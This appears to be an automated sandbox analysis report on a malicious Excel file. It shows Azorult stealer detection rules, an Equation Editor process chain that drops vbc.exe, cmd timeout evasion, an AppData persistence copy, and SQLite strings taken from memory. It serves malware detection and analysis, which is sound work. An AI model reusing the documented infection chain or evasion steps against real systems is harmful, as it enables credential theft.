              Source: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 00000009.00000000.603363406.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 00000009.00000000.603363406.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 00000009.00000000.602874997.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 00000009.00000000.602874997.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 00000004.00000002.606811341.0000000002741000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00260C904_2_00260C90
              Source: C:\Users\Public\vbc.exeCode function: 4_2_002607304_2_00260730
              Source: C:\Users\Public\vbc.exeCode function: 4_2_002609A74_2_002609A7
              Source: C:\Users\Public\vbc.exeCode function: 4_2_002609B84_2_002609B8
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00260C8A4_2_00260C8A
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0026252C4_2_0026252C
              Source: C:\Users\Public\vbc.exeCode function: 4_2_004F80E04_2_004F80E0
              Source: C:\Users\Public\vbc.exeCode function: 4_2_004F7A284_2_004F7A28
              Source: C:\Users\Public\vbc.exeCode function: 4_2_005463B04_2_005463B0
              Source: C:\Users\Public\vbc.exeCode function: 4_2_005497784_2_00549778
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0054AA414_2_0054AA41
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0054CAB84_2_0054CAB8
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00548FE04_2_00548FE0
              Source: C:\Users\Public\vbc.exeCode function: 4_2_005474C04_2_005474C0
              Source: C:\Users\Public\vbc.exeCode function: 4_2_005467084_2_00546708
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0054AD484_2_0054AD48
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00EB00484_2_00EB0048
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00EB83504_2_00EB8350
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0484B5A14_2_0484B5A1
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0484D4414_2_0484D441
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0484B5AA4_2_0484B5AA
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0484BE524_2_0484BE52
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0484BF574_2_0484BF57
              Source: C:\Users\Public\vbc.exeCode function: String function: 00404E64 appears 33 times
              Source: C:\Users\Public\vbc.exeCode function: String function: 004062D8 appears 34 times
              Source: C:\Users\Public\vbc.exeCode function: String function: 00403B98 appears 44 times
              Source: C:\Users\Public\vbc.exeCode function: String function: 00404E3C appears 87 times
              Source: C:\Users\Public\vbc.exeCode function: String function: 004034E4 appears 36 times
              Source: api-ms-win-core-synch-l1-2-0.dll.9.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-conio-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-heap-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-sysinfo-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-handle-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-debug-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-multibyte-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-utility-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-environment-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-time-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-filesystem-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-datetime-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-heap-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-processthreads-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-file-l2-1-0.dll.9.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-string-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-console-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-file-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-runtime-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-libraryloader-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-profile-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-locale-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-process-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-localization-l1-2-0.dll.9.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-file-l1-2-0.dll.9.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-interlocked-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-processthreads-l1-1-1.dll.9.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-private-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-stdio-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-namedpipe-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-convert-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-errorhandling-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-math-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-memory-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-processenvironment-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-string-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-util-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-timezone-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-synch-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-rtlsupport-l1-1-0.dll.9.drStatic PE information: No import functions for PE file found
              Source: vbc[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: vbc.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: Pthmzffh.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
              Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
              Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
              Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
              Source: Scanjet 23002022.xlsxReversingLabs: Detection: 30%
              Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ....................4.............W.a.i.t.i.n.g. .f.o.r. .2.0...x...............................................X...............................Jump to behavior
              Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ................................ .s.e.c.o.n.d.s.,. .p.r.e.s.s. .a. .k.e.y. .t.o. .c.o.n.t.i.n.u.e. .............X.......J.......................Jump to behavior
              Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ....................................1.9.(.P..................... ...............................e. .............X.........................8s....Jump to behavior
              Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ....................................1.8.(.P.....................t.......v.......................e. .............X.........................8s....Jump to behavior
              Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ....................................1.7.(.P.....................4...............................e. .............X.........................8s....Jump to behavior
              Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ....................................1.6.(.P.....................<.......>.......................e. .............X.........................8s....Jump to behavior
              Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ....................................1.5.(.P.....................................................e. .............X.........................8s....Jump to behavior
              Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ....................................1.4.(.P.....................d...............................e. .............X.........................8s....Jump to behavior
              Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ....................................1.3.(.P.....................T...............................e. .............X.........................8s....Jump to behavior
              Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ....................................1.2.(.P.....................T.......f.......................e. .............X.........................8s....Jump to behavior
              Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ....................................1.1.(.P.....................................................e. .............X.........................8s....Jump to behavior
              Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ....................................1.0.(.P.....................l.......t.......................e. .............X.........................8s....Jump to behavior
              Source: C:\Windows\SysWOW64\timeout.exeConsole Write: .................................... .9.(.P.....................l...............................e. .............X.........................8s....Jump to behavior
              Source: C:\Windows\SysWOW64\timeout.exeConsole Write: .................................... .8.(.P.....................T.......B.......................e. .............X.........................8s....Jump to behavior
              Source: C:\Windows\SysWOW64\timeout.exeConsole Write: .................................... .7.(.P.....................T...............................e. .............X.........................8s....Jump to behavior
              Source: C:\Windows\SysWOW64\timeout.exeConsole Write: .................................... .6.(.P.....................T.......q.......................e. .............X.........................8s....Jump to behavior
              Source: C:\Windows\SysWOW64\timeout.exeConsole Write: .................................... .5.(.P.....................................................e. .............X.........................8s....Jump to behavior
              Source: C:\Windows\SysWOW64\timeout.exeConsole Write: .................................... .4.(.P.............................z.......................e. .............X.........................8s....Jump to behavior
              Source: C:\Windows\SysWOW64\timeout.exeConsole Write: .................................... .3.(.P.....................................................e. .............X.........................8s....Jump to behavior
              Source: C:\Windows\SysWOW64\timeout.exeConsole Write: .................................... .2.(.P.............................,.......................e. .............X.........................8s....Jump to behavior
              Source: C:\Windows\SysWOW64\timeout.exeConsole Write: .................................... .1.(.P.....................l...............................e. .............X.........................8s....Jump to behavior
              Source: C:\Windows\SysWOW64\timeout.exeConsole Write: .................................... .0.(.P.............................".......................e. .............X.........................8s....Jump to behavior
              Source: C:\Windows\SysWOW64\timeout.exeConsole Write: .................................... .0.(.P............................./.......................e. .............X...............(.........8s....Jump to behavior
              Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ....................$.............W.a.i.t.i.n.g. .f.o.r. .2.0...........H0......................................................................Jump to behavior
              Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ................................ .s.e.c.o.n.d.s.,. .p.r.e.s.s. .a. .k.e.y. .t.o. .c.o.n.t.i.n.u.e. .....................J.......................Jump to behavior
              Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ....................................1.9.(.P.............................u0......................e. ....................................... s....Jump to behavior
              Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ....................................1.8.(.P..............................0......................e. ....................................... s....Jump to behavior
              Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ....................................1.7.(.P..............................2......................e. ....................................... s....Jump to behavior
              Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ....................................1.6.(.P.............................w2......................e. ....................................... s....Jump to behavior
              Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ....................................1.5.(.P..............................2......................e. ....................................... s....Jump to behavior
              Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ....................................1.4.(.P.....................X.......M4......................e. ....................................... s....Jump to behavior
              Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ....................................1.3.(.P..............................4......................e. ....................................... s....Jump to behavior
              Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ....................................1.2.(.P.....................l........5......................e. ....................................... s....Jump to behavior
              Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ....................................1.1.(.P.....................l.......G6......................e. ....................................... s....Jump to behavior
              Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ....................................1.0.(.P.....................l........6......................e. ....................................... s....Jump to behavior
              Source: C:\Windows\SysWOW64\timeout.exeConsole Write: .................................... .9.(.P..............................7......................e. ....................................... s....Jump to behavior
              Source: C:\Windows\SysWOW64\timeout.exeConsole Write: .................................... .8.(.P.............................c8......................e. ....................................... s....Jump to behavior
              Source: C:\Windows\SysWOW64\timeout.exeConsole Write: .................................... .7.(.P.....................l........9......................e. ....................................... s....Jump to behavior
              Source: C:\Windows\SysWOW64\timeout.exeConsole Write: .................................... .6.(.P..............................9......................e. ....................................... s....Jump to behavior
              Source: C:\Windows\SysWOW64\timeout.exeConsole Write: .................................... .5.(.P.....................$........:......................e. ....................................... s....Jump to behavior
              Source: C:\Windows\SysWOW64\timeout.exeConsole Write: .................................... .4.(.P..............................;......................e. ....................................... s....Jump to behavior
              Source: C:\Windows\SysWOW64\timeout.exeConsole Write: .................................... .3.(.P.....................<........;......................e. ....................................... s....Jump to behavior
              Source: C:\Windows\SysWOW64\timeout.exeConsole Write: .................................... .2.(.P.....................0........<......................e. ....................................... s....Jump to behavior
              Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
              Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
              Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 20
              Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exe "C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exe"
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 20
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
              Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20Jump to behavior
              Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exeJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 20Jump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 20
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Scanjet 23002022.xlsxJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRDD34.tmpJump to behavior
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLSX@15/70@3/3
              Source: C:\Users\Public\vbc.exeCode function: 9_2_0040A4A4 CoCreateInstance,9_2_0040A4A4
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
              Source: vbc.exe, 00000009.00000003.659698452.0000000004254000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671483646.0000000004104000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660270812.0000000004268000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660241054.0000000004290000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
              Source: vbc.exe, 00000009.00000003.659698452.0000000004254000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671483646.0000000004104000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660270812.0000000004268000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660241054.0000000004290000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
              Source: vbc.exe, 00000009.00000003.658728603.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.658927667.0000000003310000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671089018.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671329778.0000000003FB8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: vbc.exe, 00000009.00000003.659698452.0000000004254000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671483646.0000000004104000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660270812.0000000004268000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660241054.0000000004290000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
              Source: vbc.exe, 00000009.00000003.658728603.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.658927667.0000000003310000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671089018.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671329778.0000000003FB8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
              Source: vbc.exe, 00000009.00000003.658728603.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.658927667.0000000003310000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671089018.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671329778.0000000003FB8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
              Source: vbc.exe, 00000009.00000003.659698452.0000000004254000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671483646.0000000004104000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660270812.0000000004268000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660241054.0000000004290000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
              Source: vbc.exe, 00000009.00000003.658728603.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.658927667.0000000003310000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671089018.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671329778.0000000003FB8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
              Source: vbc.exe, 00000009.00000003.659698452.0000000004254000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671483646.0000000004104000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660270812.0000000004268000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660241054.0000000004290000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
              Source: vbc.exe, 00000009.00000003.659698452.0000000004254000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671483646.0000000004104000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660270812.0000000004268000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660241054.0000000004290000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT ALL id FROM %s WHERE %s;
              Source: vbc.exe, 00000009.00000003.659698452.0000000004254000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671483646.0000000004104000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660270812.0000000004268000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660241054.0000000004290000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT ALL id FROM %s;
              Source: vbc.exe, 00000009.00000003.659698452.0000000004254000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671483646.0000000004104000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660270812.0000000004268000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660241054.0000000004290000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
              Source: vbc.exe, 00000009.00000003.659698452.0000000004254000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671483646.0000000004104000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660270812.0000000004268000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660241054.0000000004290000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
              Source: vbc.exe, 00000009.00000003.658728603.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.658927667.0000000003310000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671089018.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671329778.0000000003FB8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: vbc.exe, 00000009.00000003.658728603.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.658927667.0000000003310000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671089018.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671329778.0000000003FB8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: vbc.exe, 00000009.00000003.658728603.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.658927667.0000000003310000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671089018.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671329778.0000000003FB8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
              Source: vbc.exe, 00000009.00000003.658728603.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.658927667.0000000003310000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671089018.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671329778.0000000003FB8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
              Source: vbc.exe, 00000009.00000003.658728603.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.658927667.0000000003310000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671089018.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671329778.0000000003FB8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: vbc.exe, 00000009.00000003.659698452.0000000004254000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671483646.0000000004104000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660270812.0000000004268000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660241054.0000000004290000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
              Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
